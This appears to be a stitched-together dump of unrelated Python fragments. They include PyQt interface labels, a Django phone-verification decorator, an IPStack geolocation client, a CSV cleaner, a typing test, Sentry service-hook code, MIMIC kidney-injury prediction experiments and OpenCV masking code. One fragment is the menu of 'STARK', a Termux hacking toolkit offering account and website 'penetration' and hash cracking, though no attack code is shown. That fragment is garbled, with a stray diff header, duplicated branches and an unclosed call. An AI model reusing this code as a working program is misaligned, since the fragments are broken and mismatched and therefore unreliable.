"Start Variogram Analysis")) self.buttonContinue3.setText(_translate("MainWindow", "Continue")) self.buttonResults.setText(_translate("MainWindow", "Analysis Results")) self.tabWidget.setTabText(self.tabWidget.indexOf(self.tabVario), _translate("MainWindow", "Variogram Analysis")) self.labelSRFTitle.setText(_translate("MainWindow", "Generate Spatial Random Fields")) self.labelSRFName.setText(_translate("MainWindow", "SRF Name:")) self.labelSRFNum.setText(_translate("MainWindow", "Number of SRFS:")) self.labelSRFDimensions.setText(_translate("MainWindow", "
Dimensions (Voxels)
")) self.labelSRFDimX.setText(_translate("MainWindow", "X")) self.labelSRFDimY.setText(_translate("MainWindow", "Y")) self.labelSRFDimZ.setText(_translate("MainWindow", "Z")) self.buttonGenSRF.setText(_translate("MainWindow", "Generate Spatial Random Fields")) self.CB_SRFFull.setText(_translate("MainWindow", " MSCSF Full Cell")) self.CB_SRFPart.setText(_translate("MainWindow", " MSCSF Part Cell")) self.labelLengthscales.setText(_translate("MainWindow", "Lengthscales")) self.labelLenTransverse.setText(_translate("MainWindow", "Transverse")) self.labelLenLong.setText(_translate("MainWindow", "Longitudinal")) self.buttonUseResults.setText(_translate("MainWindow", "Use Analysis Results")) self.labelLenCustom.setText(_translate("MainWindow", "Custom Lengthscales (μm)")) self.buttonGenPreview.setText(_translate("MainWindow", "Generate 2D Preview")) self.buttonHelp4.setText(_translate("MainWindow", "Help")) self.buttonSRFLocation.setText(_translate("MainWindow", "Open SRF Location")) self.labelOptions.setText(_translate("MainWindow", "Options")) self.labelNeighbour.setText(_translate("MainWindow", "Variance (Proportion):")) self.labelMeanExp.setText(_translate("MainWindow", "Mean Expression:")) self.buttonLoadVTK.setText(_translate("MainWindow", "Load VTK File")) self.tabWidget.setTabText(self.tabWidget.indexOf(self.tabSRF), _translate("MainWindow", "Spatial Random Field")) days = ["shanbe", "1shanbe", "2shanbe", "3shanbe", "4shanbe", "5shanbe", "jome"] day_dict = {day:True for day in days} for i in range(3): input() for day in input().split(): day_dict[day] = False print(sum(day_dict[day] for day in day_dict)) # -*- mode: python; coding: utf-8 -*- # # FirePython server-side support library # # for usage see README.markdown or http://github.com/woid/firepython # __version__ = '0.2' from django.core.exceptions import PermissionDenied from django.shortcuts import redirect from .models import Participant def phone_number_verified(function): def wrap(request, *args, **kwargs): participant = Participant.objects.get(user=request.user) if participant.verifiedPhone: return function(request, *args, **kwargs) else: return redirect('render_phone_auth') wrap.__doc__ = function.__doc__ wrap.__name__ = function.__name__ return wrap class CodeChecks: def bracket_check(self, text): """Check if that if every open bracket has a closing one.""" counter = 0 for letter in text: if letter == '{': counter += 1 elif letter == '}': counter -= 1 if counter < 0: raise Exception("Missing opening/closing bracket") # TODO: custom exceptions if counter == 0: return True else: raise Exception("Missing opening/closing bracket") # TODO: custom exceptions from django.test import TestCase from bailiwick.test import ModelViewTestSuite from .. 
import factory class ARecordViewTestCase(ModelViewTestSuite, TestCase): root_url = "records/a" model_factory = factory.ARecordFactory class NsRecordViewTestCase(ModelViewTestSuite, TestCase): root_url = "records/ns" model_factory = factory.NsRecordFactory class MxRecordViewTestCase(ModelViewTestSuite, TestCase): root_url = "records/mx" model_factory = factory.MxRecordFactory CONSUMER_KEY = '' CONSUMER_SECRET = '' ACCESS_TOKEN_KEY = '' ACCESS_TOKEN_SECRET = '' Inf1n1te/Seth class GradeException(Exception): def __init__(self, *args, **kwargs): super(GradeException, self).__init__(self, *args, **kwargs) 1-10 """GeoLookup Class""" from __future__ import print_function import time import pprint # Third Party import requests # Local imports from zat.utils import cache class GeoLookup(object): """GeoLookup: Query IPStack API (https://ipstack.com/) for Geographic information, the class contains a Cache to minimize queries. Args: apikey (str): The API key to use for IPStack queries (default=None) summary (bool): Just return summary information for GeoLookup (default=True) max_cache_size (int): Maximum size of query cache (default=10000) max_cache_time (int): Time to keep query results in cache (default=30 days) """ def __init__(self, apikey=None, summary=True, max_cache_size=10000, max_cache_time=30, throttle=True): """GeoLookup Init""" # Public API Key # Note: The key below is a low-volume public key. Please call this method with your own API key :) if apikey is None: print('Using public API Key: Please set apikey= when creating this class') pub_apikey = '' self.known_ipstack_ips = ['192.168.3.11', '192.168.127.12', '192.168.127.12'] self.apikey = apikey or pub_apikey self.summary = summary self.throttle = throttle # Create query cache seconds = max_cache_time*24*60*60 # Convert from days self.query_cache = cache.Cache(max_size=max_cache_size, timeout=seconds, load='zat_geo_cache') # Convert to Seconds @property def size(self): return self.query_cache.size def query_ip(self, ip_address, verbose=False): """Query method for the IpStack Service Args: ip_address(str): The IP Address to be queried """ # Is this a known IpStack ip address? if ip_address in self.known_ipstack_ips: return None # First check query cache cached = self.query_cache.get(ip_address) if cached: if verbose: print('Returning Cached Query Results') return cached # Not in cache so make the actual query url = 'http://api.ipstack.com/' + ip_address response = requests.post(url, params={'access_key': self.apikey}) # Make sure we got a json blob back try: output = response.json() except ValueError: error_msg = 'No valid response, throttling and trying again...' 
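# IPStack can return a non-JSON body when the query rate is exceeded.
# With throttle=True the lookup waits 30 seconds and retries itself;
# otherwise an error dictionary is returned to the caller.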
if self.throttle: if verbose: print(error_msg) time.sleep(30) return self.query_ip(ip_address) return {'error': error_msg} # Check for error or not-found if output['type'] is None: output = None self.query_cache.set(ip_address, output) return output # Summary removes 'location' info (flag, calling_code, languages, etc) if self.summary: del output['location'] # Put results in Cache self.query_cache.set(ip_address, output) self.query_cache.persist() # Return results return output # Unit test: Create the class and test it def test(): """geo_lookup.py test""" # Execute the worker (unit test) geo_lookup = GeoLookup(summary=False) output = geo_lookup.query_ip('172.16.31.10') print('\n<<< Unit Test FULL>>>') pprint.pprint(output) geo_lookup = GeoLookup() output = geo_lookup.query_ip('172.16.31.10') print('\n<<< Unit Test Summary>>>') pprint.pprint(output) output = geo_lookup.query_ip('172.16.58.3') print('\n<<< Unit Test Summary>>>') pprint.pprint(output) # Test Cache output = geo_lookup.query_ip('73.26.145.66') print('\n<<< Unit Test Cache>>>') pprint.pprint(output) # Test Size assert geo_lookup.size == 2 # Test some error conditions output = geo_lookup.query_ip('123') print('\n<<< Unit Test Malformed IP Query>>>') pprint.pprint(output) if __name__ == "__main__": test() class StaticGenerator: def __init__(self, metadata1): self.metadata1 = metadata1 def generate(self): return self.metadata1 >> CREATED BY: and BCF-Bangladesh >> Facebook : >> Instagram: @eliash >>>ONLY FOR TERMUX<<< =============================================== 1. Basic Command 2. Account Penetration 3. Website Penetration 4. Hash Cracker 5. Termux 6. Error Fixer 7. Open Old STARK2.0""","green"), colored(""" I. Important Application's""","cyan", attrs=['bold']), colored(""" M. Hacking Movie's""","green"), colored(""" S. Secret There Is No Secret0_0""","red", attrs=['bold']), colored(""" F. Follow Us""","magenta", attrs=['bold']), colored(""" C. Credits""","white", attrs=['bold']), colored(""" U. Update""","blue", attrs=['bold']), colored(""" ================================================""","green"), colored(""" H. Help""","yellow", attrs=['bold']), colored(""" E. EXIT ================================================ """,'green') loop = True while loop: menu() stark = raw_input("stark > ") if stark == "1": os.system("clear") BasicC() elif stark == "2": os.system("clear") AccountH()# encoding: utf-8 import os import sys from time import sleep as timeout from core.starkmcore import * from core.guidemcore import * from multiprocessing import Process from termcolor import colored checkfile() def menu(): os.system("clear") print colored(""" ..######..########....###....########..##....## .##....##....##......##.##...##.....##.##...##. .##..........##.....##...##..##.....##.##..##.. ..######.....##....##.....##.########..#####... .......##....##....#########.##...##...##..##.. .##....##....##....##.....##.##....##..##...##. 
..######.....##....##.....##.##.....##.##....## 3.0 >> CREATED BY:Eliash STARK and BCF-Bangladesh >> Facebook : >> Instagram: @eliash >>>ONLY FOR TERMUX<<< =============================================== @@ -67,6 +124,19 @@ def menu(): Termux() elif stark == "6": EFixer() elif stark == "i" or stark == "I": checkofflineapp( elif stark == "3": os.system("clear") WebH() elif stark == "4": os.system("clear") HASH() elif stark == "5": os.system("clear") Termux() elif stark == "6": EFixer() elif stark == "i" or stark == "I": checkofflineapp() impapp() # --- Suonostore --- # Read config file # Download CSV file (no disk) # Clean file, save from requests import Session from .supplier import Supplier, fix_illegal_sep_quotes, switch_sep, fix_illegal_inch # , ScappamentoError supplier_name = 'Suonostore' def fix_timestamp(line): return line.replace('00:00:00', '').replace('/ /', '') def fix_decimals(line): return line.replace('.00000,', ',').replace('.000,', ',').replace('.00,', ',') def update(): # Credentials and URLs key_list = ['user', 'password', 'csv_url', 'csv_filename', 'target_path'] suonostore = Supplier(supplier_name, key_list) print(suonostore) [user, password, csv_url, csv_filename, target_path] = suonostore.val_list # Download with Session() as s: print('Downloading with auth...') # Site uses HTTP Basic Auth r = s.get(csv_url, auth=(user, password), headers={'User-Agent': 'Chrome'}) # Cleanup: numbers, separators, dates, symbols sep = ';' new_csv = '' line_count = 0 problematic_line_count = 0 problematic_field_count = 0 fixed_problematic_line_count = 0 print('Cleaning up...') for line in r.content.decode(r.encoding).splitlines(): # each line in the CSV file if not line_count: # skip first line = CSV header new_csv = switch_sep(line, ',', sep) # initialize line_count = line_count + 1 continue temp_line = fix_timestamp(line) temp_line = fix_decimals(temp_line) temp_line = temp_line.replace('", ', '"; ') # hack temp_line = switch_sep(temp_line, ',', sep) temp_line, sep_modified = fix_illegal_sep_quotes(temp_line, sep, ',') # fix illegal separators field_count = 0 temp_cod_art = '' rebuilt_temp_line = '' found_problematic_field = False match = False for field in temp_line.split(';'): # for each field in line: look for double quotes as symbols if field_count == 1: # if second field temp_cod_art = field if field.count('"') % 2: # if double quotes parity check fails found_problematic_field = True [temp_field, match] = fix_illegal_inch(field) rebuilt_temp_line = rebuilt_temp_line + sep + temp_field if not match: # problematic fields are copied as-is for now print('⚠ [ Row ', line_count, '][', temp_cod_art, ']', 'Uh oh: field ', field_count + 1) problematic_field_count = problematic_field_count + 1 rebuilt_temp_line = rebuilt_temp_line + sep + field else: if not field_count: rebuilt_temp_line = field else: rebuilt_temp_line = rebuilt_temp_line + sep + field field_count = field_count + 1 if found_problematic_field or sep_modified: # if intervention was necessary if match or sep_modified: # if a solution was found fixed_problematic_line_count = fixed_problematic_line_count + 1 problematic_line_count = problematic_line_count + 1 new_csv = new_csv + '\n' + rebuilt_temp_line.strip() line_count = line_count + 1 print('⚠ ' if problematic_field_count else '✓ ', problematic_field_count, ' problematic field', '' if problematic_field_count == 1 else 's', ' in ', problematic_line_count - fixed_problematic_line_count, ' problematic line', '' if problematic_line_count - fixed_problematic_line_count == 1 else 
's', ' (', problematic_line_count, ' lines total, ', fixed_problematic_line_count, ' fixed)', sep='') with open(target_path + csv_filename, 'w', encoding='utf-8') as f: f.write(new_csv) if __name__ == '__main__': update() import datetime import random list1 = ["Python is a good programming language for beginners. It is a high-level language, which means a programmer can focus on what to do instead of how to do it. Writing programs in Python" "takes less time than in some other languages","It is essentially the brain of the computer and though it is the main determining factor in the processing power of the computer as a " "whole","A computer does not have enough creativity to make tasks for which it is not programmed, so it can only follow the instructions of the programs that it has been programmed for." "The ones in charge to generate programs so that the computers may perform new tasks are programmers.","A day in the future will come when human civilization won’t be able to survive without" "computers as we depend on them too much. Till now it is a great discovery of mankind that has helped in saving thousands and millions of lives.","Programme is a sequence of instructions" "written in a proper language through which the computer can understand and solve the problem given to it. It is the method by which the whole computing process is directed and controlled.", "A flow chart illustrates the sequence of operations to be performed to arrive at the solution of a problem. The operating instructions are placed in boxes which are connected by arrows to" "indicate the order of execution.","Artificial Intelligence refers to the intelligence of machines. This is in contrast to the natural intelligence of humans and animals. With Artificial" "Intelligence, machines perform functions such as learning, planning, reasoning and problem-solving. Most noteworthy, Artificial Intelligence is the simulation of human intelligence by machines."] a = random.choice(list1) a.replace(".","") a.replace(",","") print(a) l = len(a.split()) initTime = datetime.datetime.now() b = input("Type here: ") elem1 = [x for x in a.split()] elem2 = [x for x in b.split()] correct,false = 0,0 for item in elem1: if item in elem2: correct+=1 else: false+=1 endTime = datetime.datetime.now() Time = round(((endTime - initTime).total_seconds())/60,2) n1 = round(correct/Time,0) n2 = round((correct-false)/Time,0) if n2 != 0: n3 = round((n2/n1)*100,2) else: n3 = 100 print(f"\nResults\nCongratulations, You have typed {correct} words correct out of {l} words in {Time} minutes\n") print(f"Gross Speed: {n1} WPM\nNet Speed: {n2} WPM\nAccuracy: {n3}%") src/sentry/mediators/service_hooks/creator.py1-10 from __future__ import absolute_import import six from collections import Iterable from itertools import chain from sentry.mediators import Mediator, Param from sentry.models import ServiceHook # Subscribing to these events via the UI is done in a resource-centric way. # This means you subscribe to "Issue" events. There are many types of Issue # events - this maps those resource-centric values to the actual events # emitted. EVENT_EXPANSION = { 'issue': ['issue.created'], } def expand_events(rolled_up_events): """ Convert a list of rolled up events ('issue', etc) into a list of raw event types ('issue.created', etc.) 
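    For example, with the EVENT_EXPANSION mapping above::

        >>> sorted(expand_events(['issue', 'comment.created']))
        ['comment.created', 'issue.created']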
""" return set(chain.from_iterable( [EVENT_EXPANSION.get(event, [event]) for event in rolled_up_events] )) def consolidate_events(raw_events): """ Consolidate a list of raw event types ('issue.created', etc) into a list of rolled up events ('issue', etc). """ return set( name for (name, rolled_up_events) in six.iteritems(EVENT_EXPANSION) if any(set(raw_events) & set(rolled_up_events)) ) class Creator(Mediator): application = Param('sentry.models.ApiApplication', required=False) actor = Param('sentry.db.models.BaseModel') project = Param('sentry.models.Project') events = Param(Iterable) url = Param(six.string_types) def call(self): self.hook = self._create_service_hook() return self.hook def _create_service_hook(self): return ServiceHook.objects.create( application_id=self.application.id, actor_id=self.actor.id, project_id=self.project.id, events=expand_events(self.events), url=self.url, ) import os, sys import pandas as pd import numpy as np from sklearn.preprocessing import MinMaxScaler, OneHotEncoder, Imputer from sklearn.model_selection import StratifiedKFold from Compute_gower_distance import select_train_samples from sklearn.ensemble import GradientBoostingClassifier from sklearn.model_selection import GridSearchCV from sklearn.metrics import confusion_matrix, classification_report, roc_curve, accuracy_score, auc, precision_recall_fscore_support from sklearn.linear_model import LogisticRegression from sklearn.metrics import roc_auc_score from xgboost import XGBClassifier RANDOM_STATE = 15485867 folder = '/Users/xuzhenxing/Documents/mimic_AKI_data/real_time_prediction/features/all/dropped/xy' # folder = './xy' def preprocessing(folder, time_interval, isnormalized=True): """Data preprocessing, Preprocessing missing data with mean imputation; Normalize continous feature with MinMaxScaler; Normalize categorical feature with OneHotEncoder. Args: folder: dir path of source data; time_interval: interval of time, can be 24,48,72,96,120,144. 
Returns: x: features y: lables """ all_xy = pd.read_csv(os.path.join(folder, 'all_{}hours_test_individualization_1thousand.csv'.format(time_interval)), index_col=0) # print (all_xy.shape) # print (all_xy.columns) medi = ['diuretics', 'nsaid', 'radio', 'angiotensin'] pat = ['gender', 'age', 'ethnicity'] # Total 9 comorbidity comm = ['congestive_heart_failure', 'peripheral_vascular', 'hypertension', 'diabetes', 'liver_disease', 'mi', 'cad', 'cirrhosis', 'jaundice'] # Total 8 chartevents chart = ['DiasBP_min', 'DiasBP_max', 'DiasBP_first', 'DiasBP_last', 'DiasBP_slope', 'DiasBP_avg', 'Glucose_min', 'Glucose_max', 'Glucose_first', 'Glucose_last', 'Glucose_slope', 'Glucose_avg', 'HeartRate_min', 'HeartRate_max', 'HeartRate_first', 'HeartRate_last', 'HeartRate_slope', 'HeartRate_avg', 'MeanBP_min', 'MeanBP_max', 'MeanBP_first', 'MeanBP_last', 'MeanBP_slope', 'MeanBP_avg', 'RespRate_min', 'RespRate_max', 'RespRate_first', 'RespRate_last', 'RespRate_slope', 'RespRate_avg', 'SpO2_min', 'SpO2_max', 'SpO2_first', 'SpO2_last', 'SpO2_slope', 'SpO2_avg', 'SysBP_min', 'SysBP_max', 'SysBP_first', 'SysBP_last', 'SysBP_slope', 'SysBP_avg', 'Temp_min', 'Temp_max', 'Temp_first', 'Temp_last', 'Temp_slope', 'Temp_avg'] # Total 12 labvents lab = ['BICARBONATE_first', 'BICARBONATE_last', 'BICARBONATE_min', 'BICARBONATE_max', 'BICARBONATE_avg', 'BICARBONATE_slope', 'BICARBONATE_count', 'BUN_first', 'BUN_last', 'BUN_min', 'BUN_max', 'BUN_avg', 'BUN_slope', 'BUN_count', 'CHLORIDE_first', 'CHLORIDE_last', 'CHLORIDE_min', 'CHLORIDE_max', 'CHLORIDE_avg', 'CHLORIDE_slope', 'CHLORIDE_count', 'CREATININE_first', 'CREATININE_last', 'CREATININE_min', 'CREATININE_max', 'CREATININE_avg', 'CREATININE_slope', 'CREATININE_count', 'HEMOGLOBIN_first', 'HEMOGLOBIN_last', 'HEMOGLOBIN_min', 'HEMOGLOBIN_max', 'HEMOGLOBIN_avg', 'HEMOGLOBIN_slope', 'HEMOGLOBIN_count', 'INR_first', 'INR_last', 'INR_min', 'INR_max', 'INR_avg', 'INR_count', 'PLATELET_first', 'PLATELET_last', 'PLATELET_min', 'PLATELET_max', 'PLATELET_avg', 'PLATELET_slope', 'PLATELET_count', 'POTASSIUM_first', 'POTASSIUM_last', 'POTASSIUM_min', 'POTASSIUM_max', 'POTASSIUM_avg', 'POTASSIUM_slope', 'POTASSIUM_count', 'PT_first', 'PT_last', 'PT_min', 'PT_max', 'PT_avg', 'PT_count', 'PTT_first', 'PTT_last', 'PTT_min', 'PTT_max', 'PTT_avg', 'PTT_count', 'WBC_first', 'WBC_last', 'WBC_min', 'WBC_max', 'WBC_avg', 'WBC_slope', 'WBC_count', 'CALCIUM_first', 'CALCIUM_last', 'CALCIUM_min', 'CALCIUM_max', 'CALCIUM_avg', 'CALCIUM_count' ] if time_interval != 24: # The 24h data lack of the feature 'CALCIUM_slope' lab.append('CALCIUM_slope') subset = medi + pat + comm + ['avg_urine'] + ['egfr_min'] + ['label'] # note that ['avg_urine'] + ['egfr_min'] is important, ignoring if they are empty. 
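# Rows missing any medication, demographic, comorbidity, avg_urine, egfr_min or
# label value are dropped outright; missing chart/lab values are instead filled
# later by mean imputation, and (when isnormalized is True) the continuous block
# is MinMax-scaled while the categorical block is one-hot encoded.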
all_xy = all_xy.dropna(subset=subset) # print ('after dropping nan in the catergorical variables, the shape is {}'.format(all_xy.shape)) all_conti_x = all_xy[chart + lab + ['avg_urine'] + ['egfr_min'] + ['age']] # print (all_conti_x.shape) # print (all_conti_x) all_categ_x = all_xy[['gender'] + ['ethnicity'] + medi + comm] # print (all_categ_x.shape) # print (all_categ_x) # Using mean imputer after drop the nan data in medication, patient demographic data, avg_ureine, egfr_min and label imp = Imputer(strategy='mean', axis=0) all_conti_x_fitted = imp.fit_transform(all_conti_x) def normalize(all_conti_x_fitted, all_categ_x): # using the MinMaxScaler to normalization the all_x min_max_scaler = MinMaxScaler() all_conti_x_fitted = min_max_scaler.fit_transform(all_conti_x_fitted) # print (all_conti_x_fitted.shape, all_conti_x_fitted) # all_conti_x = DataFrame(all_conti_x_fitted, columns=all_conti_x.columns) # print (all_conti_x.shape) onehot_enc = OneHotEncoder(sparse=False) # dense format all_categ_x_fitted = onehot_enc.fit_transform(all_categ_x) # print (all_categ_x_fitted.shape, all_categ_x_fitted) return all_conti_x_fitted, all_categ_x_fitted if isnormalized: all_conti_x_fitted, all_categ_x_fitted = normalize(all_conti_x_fitted, all_categ_x) x = np.hstack((all_conti_x_fitted, all_categ_x_fitted)) # y = all_xy['label'] # x = np.array(x) # y = np.array(y) # print (x.shape, y.shape) # return x, y y = all_xy['label'] z_icustay_id = y.index x = np.array(x) y = np.array(y) z_icustay_id = np.array(z_icustay_id) print (x.shape, y.shape) return x, y, z_icustay_id, all_xy def perf_model(pipe, param_grid, name, X_train, X_test, y_train, y_test, scoring, verbose=0): gs = GridSearchCV(estimator=pipe, param_grid=param_grid, scoring=scoring, cv=5, n_jobs=-1, verbose=verbose) gs.fit(X_train, y_train) y_train_pred = gs.predict(X_train) y_test_pred = gs.predict(X_test) acc_train = accuracy_score(y_true=y_train, y_pred=y_train_pred) acc_test = accuracy_score(y_true=y_test, y_pred=y_test_pred) fpr, tpr, _ = roc_curve(y_train, gs.predict_proba(X_train)[:, 1]) auc_train = auc(fpr, tpr) fpr, tpr, _ = roc_curve(y_test, gs.predict_proba(X_test)[:, 1]) auc_test = auc(fpr, tpr) confmat_train = confusion_matrix(y_true=y_train, y_pred=y_train_pred) confmat_test = confusion_matrix(y_true=y_test, y_pred=y_test_pred) print (' best parameter: ', gs.best_params_) print (' training acc:%.2f auc:%.2f ' % (acc_train, auc_train)) print (' testing acc:%.2f auc:%.2f ' % (acc_test, auc_test)) print (' train confusion matrix:\n', confmat_train) print (' testing confusion matrix:\n', confmat_test) print (' classification report:\n', classification_report(y_test, y_test_pred)) train_report = np.array(precision_recall_fscore_support(y_train, y_train_pred)) train_class1_report = train_report[:, 1] train_metrics = list(train_class1_report[:-1]) train_metrics.extend([acc_train, auc_train]) print ('training metrics: precision, recall, f1-score, acc, auc') print (train_metrics) test_report = np.array(precision_recall_fscore_support(y_test, y_test_pred)) test_class1_report = test_report[:, 1] test_metrics = list(test_class1_report[:-1]) test_metrics.extend([acc_test, auc_test]) print ('test metrics: precision, recall, f1-score, acc, auc') print (test_metrics) return train_metrics, test_metrics """ plt.xlabel("False Positive Rate") plt.ylabel("True Positive Rate (recall)") plt.plot(fpr, tpr, label="acc:%f auc:%f" % (acc_test, auc_test)) plt.legend(loc="best") plt.show() plt.close() precision, recall, _ = precision_recall_curve(y_train, 
gs.predict_proba(X_train)[:,1]) average_precision = average_precision_score(y_test, gs.predict_proba(X_test)[:,1]) plt.xlabel("precision") plt.ylabel("recall") plt.step(precision, recall, where='post', label='AP={0:0.2f}'.format(average_precision)) plt.legend(loc="best") plt.show() plt.close() """ def try_dbdt(X_train, X_test, y_train, y_test, scoring): gbm = GradientBoostingClassifier(learning_rate=0.05, n_estimators=120, min_samples_leaf=60, max_features=9, subsample=0.7, random_state=10) param_grid = {'max_depth': list(range(3, 14, 2)), 'min_samples_split': list(range(100, 801, 200))} train_metrics, test_metrics = perf_model(gbm, param_grid, 'GBDT', X_train, X_test, y_train, y_test, scoring, 0) return train_metrics, test_metrics def try_models_cross(X_train, X_test, y_train, y_test, scoring):# select data cross 5 Fold # X_train, X_test, y_train, y_test = train_test_split(X, Y, train_size=0.7, stratify=Y, random_state=RANDOM_STATE) # """ # print ('\n\nLinear Logistic Regression with L1 Penalty') # lgr_l1_train_metrics, lgr_l1_test_metrics = try_lgr_l1(X_train, X_test, y_train, y_test, scoring) # # print ('\n\nLinear Logistic Regression with L2 Penalty') # lgr_l2_train_metrics, lgr_l2_test_metrics = try_lgr_l2(X_train, X_test, y_train, y_test, scoring) # # print ('\n\nStochastic Gradient Descent') # Elastic_train_metrics, Elastic_test_metrics = try_sgd(X_train, X_test, y_train, y_test, scoring) # # print ('\n\nRandom Forest') # rf_train_metrics, rf_test_metrics = try_rf(X_train, X_test, y_train, y_test, scoring) # # print ('\n\nGradient Boosting Decision tree') xgboost_train_metrics, xgboost_test_metrics = try_dbdt(X_train, X_test, y_train, y_test, scoring) if __name__ == '__main__': path = './logs/individualization_24_1th.txt' f = open(path, 'a+') orig_stdout = sys.stdout sys.stdout = f for time_interval in [24]: # ,48,72,96,120,144]: x, y, z_icustay_id, all_xy = preprocessing(folder, time_interval) # all_xy is for compute gower distance skf = StratifiedKFold(n_splits=5) print '%%%%%' num_fold = 0 for train_index, test_index in skf.split(x, y): print '***************' # print 'This is the '+ str(i)+' times result of '+str(n_fold)+' fold' X_train_0, X_test_0 = x[train_index], x[test_index] y_train_0, y_test_0 = y[train_index], y[test_index] print '#####################' num_fold = num_fold + 1 print 'this is the results of the %d fold in 5 folds:' %num_fold print 'the number of testing samples in this fold:', test_index.size train_z_icustay_id = z_icustay_id[train_index] # the icustay_id of samples in training set from 5 fold test_z_icustay_id = z_icustay_id[test_index] # the icustay_id of samples in testing set from 5 fold xg_one_fold_pred = [] # obtain the pred label of testing samples for one fold using xgboost xg_one_fold_proba = [] # obtain the proba of testing samples for one fold using xgboost lr_one_fold_pred = [] # obtain the pred label of testing samples for one fold using lr lr_one_fold_proba = [] # obtain the proba of testing samples for one fold using lr indicator_time = 0 # the indicator for i, j in zip(test_z_icustay_id, test_index): # i_index = np.where(test_z_icustay_id == i) # tem_test_z_icustay_id = np.delete(test_z_icustay_id, i_index) testing_sample_id = i all_xy_0 = all_xy.loc[train_z_icustay_id] # select training samples from 5 fold all_xy_training = all_xy_0.append(all_xy.loc[i]) # note that , containing the i m = 400 # m is the number of similar cases or similar controls X_test_00 = x[j] y_test = y[j] X_test = X_test_00.reshape(1, -1) # print 'start 
selecting......' Id_train_set = select_train_samples(testing_sample_id, all_xy_training, m, time_interval) # individulization ix = np.isin(z_icustay_id, Id_train_set) Id_train_set_index = list(np.where(ix)) # Id_train_set_index = np.argwhere(z_icustay_id == Id_train_set) X_train = x[Id_train_set_index] y_train = y[Id_train_set_index] # print 'start training......' # scoring = 'roc_auc' # xgboost xgboost_mod = XGBClassifier(learning_rate=0.1, n_estimators=100, max_depth=5, min_child_weight=2, gamma=0, subsample=0.8, colsample_bytree=0.8, objective='binary:logistic', nthread=4, scale_pos_weight=1, seed=27) xgboost_mod.fit(X_train, y_train) xg_y_pred = xgboost_mod.predict(X_test) xg_y_pred_proba = xgboost_mod.predict_proba(X_test)[:,1] xg_one_fold_pred.append(xg_y_pred) xg_one_fold_proba.append(xg_y_pred_proba) # lr logreg = LogisticRegression(penalty='l2', dual=False, tol=0.0001, C=10, fit_intercept=True, intercept_scaling=1, class_weight='balanced', random_state=None) logreg.fit(X_train, y_train) lr_y_pred = logreg.predict(X_test) lr_y_pred_proba = logreg.predict_proba(X_test)[:,1] lr_one_fold_pred.append(lr_y_pred) lr_one_fold_proba.append(lr_y_pred_proba) indicator_time = indicator_time + 1 # print 'the next testing sample and total samples:', indicator_time, test_index.size xg_y_individual_pred = np.array(xg_one_fold_pred) xg_y_individual_proba = np.array(xg_one_fold_proba) lr_y_individual_pred = np.array(lr_one_fold_pred) lr_y_individual_proba = np.array(lr_one_fold_proba) one_fold_y_test = y[test_index] print 'this is the result of individual predictor using xgboost:' print 'the acc of one fold:', accuracy_score(one_fold_y_test, xg_y_individual_pred) print 'the classification_report :', classification_report(one_fold_y_test, xg_y_individual_pred) print 'the auc of one fold:', roc_auc_score(one_fold_y_test, xg_y_individual_proba) print 'this is the result of individual predictor using lr:' print 'the acc of one fold:', accuracy_score(one_fold_y_test, lr_y_individual_pred) print 'the classification_report :', classification_report(one_fold_y_test, lr_y_individual_pred) print 'the auc of one fold:', roc_auc_score(one_fold_y_test, lr_y_individual_pred) # using non-individual predictor for classification xgboost_random = XGBClassifier(learning_rate=0.1, n_estimators=100, max_depth=5, min_child_weight=2, gamma=0, subsample=0.8, colsample_bytree=0.8, objective='binary:logistic', nthread=4, scale_pos_weight=1, seed=27) xgboost_random.fit(X_train_0, y_train_0) y_pred_random = xgboost_random.predict(X_test_0) y_proba_random = xgboost_random.predict_proba(X_test_0)[:,1] y_test_random = y[test_index] print 'this is the result of non-individual predictor using xgboost:' print 'the acc is:',accuracy_score(y_test_random, y_pred_random) print 'the classification_report:', classification_report(y_test_random, y_pred_random) print 'the auc is:', roc_auc_score(y_test_random, y_proba_random) logreg_random = LogisticRegression(penalty='l2', dual=False, tol=0.0001, C=10, fit_intercept=True, intercept_scaling=1, class_weight='balanced', random_state=None) logreg_random.fit(X_train_0, y_train_0) lr_y_pred_random = logreg_random.predict(X_test_0) lr_y_pred_proba_random = logreg_random.predict_proba(X_test_0)[:, 1] print 'this is the result of non-individual predictor using lr:' print 'the acc is:',accuracy_score(y_test_random, lr_y_pred_random) print 'the classification_report:', classification_report(y_test_random, lr_y_pred_random) print 'the auc is:', roc_auc_score(y_test_random, lr_y_pred_proba_random) # 
break sys.stdout = orig_stdout f.close() """ Detects the outline of the tree """ import numpy as np import cv2 def outline(image): # convert the image to grayscale, blur it, and find edges # in the image gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) gray = cv2.GaussianBlur(gray, (5, 5), 0) # edged = cv2.Canny(gray, 75, 200) cnt = cv2.findContours(gray, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)[-2] # contours are the second-to-last return value in both OpenCV 3.x and 4.x return cnt # to visualise instead: cv2.drawContours(image, cnt, -1, (0, 255, 0), 5); return image def color_ratio(image): color = 0 total = 0 for arr in image: for r in arr: if sum(r): color += 1 total += 1 return total/color # Green ((0, 19, 0), (197, 250, 186)) # Red ((0, 0, 14), (116, 0, 252)) # Gold def apply_mask(image, color_range): lower = np.array(color_range[0], dtype = 'uint8') upper = np.array(color_range[1], dtype = 'uint8') mask = cv2.inRange(image, lower, upper) return cv2.bitwise_and(image, image, mask=mask) def apply_not_mask(image, color_range): lower = np.array(color_range[0], dtype = 'uint8') upper = np.array(color_range[1], dtype = 'uint8') mask = cv2.inRange(image, lower, upper) return cv2.bitwise_not(image, image, mask=mask) def apply_hsv_mask(image, color=255): hsv_img = cv2.cvtColor(image, cv2.COLOR_BGR2HSV) lower = (50, 100, 100) upper = (70, 255, 255) mask = cv2.inRange(hsv_img, lower, upper) hsv_img = cv2.bitwise_and(hsv_img, hsv_img, mask=mask) return cv2.cvtColor(hsv_img, cv2.COLOR_HSV2BGR) def main(image): green = ([25, 15, 15], [250, 100, 75]) red = ([17, 15, 100], [50, 56, 200]) alls = ([0,0,0],[255,255,255]) lower = np.array(alls[0], dtype = "uint8") upper = np.array(alls[1], dtype = "uint8") mask = cv2.inRange(image, lower, upper) output = cv2.bitwise_and(image, image, mask = mask) return output paulross/pymemtrace10-100 # -*- coding: utf-8 -*- """Top-level package for pymemtrace.""" __author__ = """""" __email__ = '' __version__ = '0.1.1' from setuptools import setup, Distribution, find_packages class BinaryDistribution(Distribution): def has_ext_modules(self): return True with open("README.md", "r") as fh: long_description = fh.read() # setup( # name='cacho', # version='0.0.6', # author="Sanix-darker", # author_email="", # description="A tiny C++ in-memory cache system with Least recently 